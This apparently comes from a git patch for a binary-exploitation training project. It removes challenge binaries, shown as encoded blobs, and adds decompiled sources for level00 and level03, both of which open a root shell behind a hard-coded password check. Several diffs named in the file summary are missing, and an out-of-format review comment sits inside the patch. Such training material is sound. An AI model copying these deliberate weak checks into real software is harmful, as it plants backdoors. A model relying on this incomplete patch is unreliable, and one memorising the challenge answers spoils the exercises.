From 7dd0fe3f85c3e5a77178ea204e00c82f23afcce4 Mon Sep 17 00:00:00 2001 
From: gbrochar Date: Wed, 2 Jul 2025 13:58:59 +0200 Subject: [PATCH] feat: walkthroughs and sources --- level00/Ressources/level00 | Bin 7280 -> 0 bytes level00/source | 19 ++ .../{Ressources/walktrough.md => walkthrough} | 0 level01/Ressources/level01 | Bin 7360 -> 0 bytes level01/source | 84 ++++++++ level01/walkthrough | 5 + level02/Ressources/level02 | Bin 9452 -> 0 bytes level02/Ressources/walktrough.md | 1 - level02/source | 73 +++++++ level02/walkthrough | 13 ++ level03/Ressources/level03 | Bin 7677 -> 0 bytes level03/source | 144 +++++++++++++ level03/walkthrough | 2 + level04/Ressources/level04 | Bin 7797 -> 0 bytes level04/Ressources/walkthrough.md | 72 ------- level04/source | 46 +++++ level04/walkthrough | 10 + level05/Ressources/level05 | Bin 5176 -> 0 bytes level05/Ressources/walktrough.md | 4 - level05/source | 35 ++++ level05/walkthrough | 4 + level06/Ressources/level06 | Bin 7907 -> 0 bytes level06/source | 71 +++++++ level06/walkthrough | 1 + level07/Ressources/exploit.txt | 40 ++++ level07/Ressources/level07 | Bin 11744 -> 0 bytes level07/source | 191 ++++++++++++++++++ level07/walkthrough | 6 + level08/Ressources/level08 | Bin 12975 -> 0 bytes level08/source | 113 +++++++++++ level08/walkthrough | 49 +---- level09/Ressources/level09 | Bin 12959 -> 0 bytes level09/source | 82 ++++++++ level09/walkthrough | 3 + 34 files changed, 948 insertions(+), 120 deletions(-) delete mode 100755 level00/Ressources/level00 create mode 100644 level00/source rename level00/{Ressources/walktrough.md => walkthrough} (100%) delete mode 100755 level01/Ressources/level01 create mode 100644 level01/source create mode 100644 level01/walkthrough delete mode 100755 level02/Ressources/level02 delete mode 100644 level02/Ressources/walktrough.md create mode 100644 level02/source create mode 100644 level02/walkthrough delete mode 100755 level03/Ressources/level03 create mode 100644 level03/source create mode 100644 level03/walkthrough delete mode 100755 
level04/Ressources/level04 delete mode 100644 level04/Ressources/walkthrough.md create mode 100644 level04/source create mode 100644 level04/walkthrough delete mode 100755 level05/Ressources/level05 delete mode 100644 level05/Ressources/walktrough.md create mode 100644 level05/source create mode 100644 level05/walkthrough delete mode 100755 level06/Ressources/level06 create mode 100644 level06/source create mode 100644 level06/walkthrough create mode 100644 level07/Ressources/exploit.txt delete mode 100755 level07/Ressources/level07 create mode 100644 level07/source delete mode 100755 level08/Ressources/level08 create mode 100644 level08/source delete mode 100755 level09/Ressources/level09 create mode 100644 level09/source 
diff --git a/level00/Ressources/level00 b/level00/Ressources/level00 deleted file mode 100755 index a02f2900c99ecc92790ac734c7f38045209fa7d6..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7280 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 diff --git a/level00/source b/level00/source new file mode 100644 index 0000000..07becb6 --- /dev/null +++ b/level00/source @@ -0,0 +1,19 @@ +bool main(void) + +{ + int local_14 [4]; + + puts("***********************************"); + puts("* \t -Level00 -\t\t *"); + puts("***********************************"); + printf("Password:"); + __isoc99_scanf(&DAT_08048636,local_14); + if (local_14[0] != 0x149c) { + puts("\nInvalid Password!"); + } + else { + puts("\nAuthenticated!"); + system("/bin/sh"); + } + return local_14[0] != 0x149c; +} diff --git a/level00/Ressources/walktrough.md b/level00/walkthrough similarity index 100% rename from level00/Ressources/walktrough.md rename to level00/walkthrough 
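Review bot: `__isoc99_scanf(&DAT_08048636,local_14)` leaves the format string as an unresolved Ghidra data reference, so the listing does not say what type the password is parsed as, nor why the buffer is declared `int local_14 [4]` when only `local_14[0]` is ever compared. Record the literal behind `DAT_08048636` in a comment on that line, e.g. `/* DAT_08048636 = scanf format string, literal: <recovered-format> */`, and add a one-line header stating this is a Ghidra decompilation of the level00 binary (tool version and binary hash would help reproducibility). The hard-coded comparison `local_14[0] != 0x149c` is the entire authentication check and is worth a comment saying so, since the same expression is also the function's return value.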
diff --git a/level01/Ressources/level01 b/level01/Ressources/level01 deleted file mode 100755 index d556e339c72017a817ff2a43841e3a1e8bfef245..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 7360 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 diff --git a/level03/source b/level03/source new file mode 100644 index 0000000..61c7267 --- /dev/null +++ b/level03/source 
@@ -0,0 +1,144 @@
+
+int decrypt(EVP_PKEY_CTX *ctx,uchar *out,size_t *outlen,uchar *in,size_t inlen)
+
+{
+ char cVar1;
+ uint uVar2;
+ int iVar3;
+ undefined4 *puVar4;
+ byte *pbVar5;
+ int in_GS_OFFSET;
+ bool bVar6;
+ bool bVar7;
+ uint local_2c;
+ undefined4 local_21;
+ undefined4 local_1d;
+ undefined4 local_19;
+ undefined4 local_15;
+ undefined local_11;
+ int local_10;
+
+ local_10 = *(int *)(in_GS_OFFSET + 0x14);
+ local_21 = 0x757c7d51;
+ local_1d = 0x67667360;
+ local_19 = 0x7b66737e;
+ local_15 = 0x33617c7d;
+ local_11 = 0;
+ uVar2 = 0xffffffff;
+ puVar4 = &local_21;
+ do {
+ if (uVar2 == 0) break;
+ uVar2 = uVar2 - 1;
+ cVar1 = *(char *)puVar4;
+ puVar4 = (undefined4 *)((int)puVar4 + 1);
+ } while (cVar1 != '\0');
+ local_2c = 0;
+ while( true ) {
+ bVar6 = local_2c < ~uVar2 - 1;
+ bVar7 = local_2c == ~uVar2 - 1;
+ if (!bVar6) break;
+ *(byte *)((int)&local_21 + local_2c) = (byte)ctx ^ *(byte *)((int)&local_21 + local_2c);
+ local_2c = local_2c + 1;
+ }
+ iVar3 = 0x11;
+ puVar4 = &local_21;
+ pbVar5 = (byte *)"Congratulations!";
+ do {
+ if (iVar3 == 0) break;
+ iVar3 = iVar3 + -1;
+ bVar6 = *(byte *)puVar4 < *pbVar5;
+ bVar7 = *(byte *)puVar4 == *pbVar5;
+ puVar4 = (undefined4 *)((int)puVar4 + 1);
+ pbVar5 = pbVar5 + 1;
+ } while (bVar7);
+ if ((!bVar6 && !bVar7) == bVar6) {
+ iVar3 = system("/bin/sh");
+ }
+ else {
+ iVar3 = puts("\nInvalid Password");
+ }
+ if (local_10 == *(int *)(in_GS_OFFSET + 0x14)) {
+ return iVar3;
+ }
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+}
+
+
+void test(int param_1,int param_2)
+{
+ EVP_PKEY_CTX *pEVar1;
+ uchar *in_stack_ffffffd8;
+ size_t *in_stack_ffffffdc;
+ uchar *in_stack_ffffffe0;
+ size_t in_stack_ffffffe4;
+
+ pEVar1 = (EVP_PKEY_CTX *)(param_2 - param_1);
+ switch(pEVar1) {
+ default:
+ pEVar1 = (EVP_PKEY_CTX *)rand();
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x1:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x2:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x3:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x4:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x5:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x6:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x7:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x8:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x9:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x10:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x11:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x12:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x13:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x14:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ break;
+ case (EVP_PKEY_CTX *)0x15:
+ decrypt(pEVar1,in_stack_ffffffd8,in_stack_ffffffdc,in_stack_ffffffe0,in_stack_ffffffe4);
+ }
+ return;
+}
+
+undefined4 main(void)
+{
+ uint __seed;
+
+ __seed = time((time_t *)0x0);
+ srand(__seed);
+ puts("***********************************");
+ puts("*\t\tlevel03\t\t**");
+ puts("***********************************");
+ printf("Password:");
+ __isoc99_scanf();
+ test();
+ return 0;
+}
+
diff --git a/level03/walkthrough b/level03/walkthrough
new file mode 100644
index 0000000..6cdd81e
--- /dev/null
+++ b/level03/walkthrough
@@ -0,0 +1,2 @@
